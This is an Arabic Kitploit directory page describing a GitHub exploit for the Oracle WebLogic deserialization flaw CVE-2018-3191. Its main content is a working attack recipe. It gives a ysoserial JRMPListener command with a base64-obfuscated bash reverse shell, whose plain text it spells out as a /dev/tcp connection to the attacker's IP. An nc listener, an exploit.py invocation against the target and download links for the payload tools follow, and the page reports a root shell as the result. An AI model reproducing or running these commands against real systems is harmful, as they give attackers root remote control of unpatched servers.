Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-3191 — CVE-2018-3191 شل عكسي | Kitploit
أدوات/GitHubGitHub/libraggbond/cve-2018-3191
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHublibraggbond/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 شل عكسي

عرض المستودع
6329منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-3191

CVE-2018-3191 شل عكسي (Reverse Shell) IP المحلي: 172.16.38.1 Weblogic: 172.16.38.174:7001

  1. التنفيذ محليًا java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

ثم تنفيذ nc -lvv 7777

(1) أمر bash لتجنب تحويل الرموز الخاصة أثناء تنفيذ Runtime.getRuntime().exec()، تم تحويله باستخدام base64 ثم فك تشفيره، النص الصريح: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) هذه العملية تنشئ مستمع JRMPListener محليًا، يستقبل طلب Weblogic المخترق وينفذ أمر bash العكسي المحدد. (3) Nc تستمع على المنفذ 7777 انتظارًا لاتصال bash العكسي من مضيف Weblogic. 2. تنفيذ python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222، استغلال الثغرة لجعل Weblogic يصل إلى خدمة RMI البعيدة وينفذ أمر bash العكسي.

  1. المنفذ الذي يستمع عليه nc يستقبل bash العكسي بصلاحية الجذر (root).

الأدوات المطلوبة للهجوم: ysoserial-master.jar // أداة استغلال إلغاء التسلسل https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // أداة توليد حمولة CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // أداة إرسال بروتوكول T3 الخاصة بـ Weblogic، مدمجة مع حمولة CVE-2018-3191

تنزيل الأداة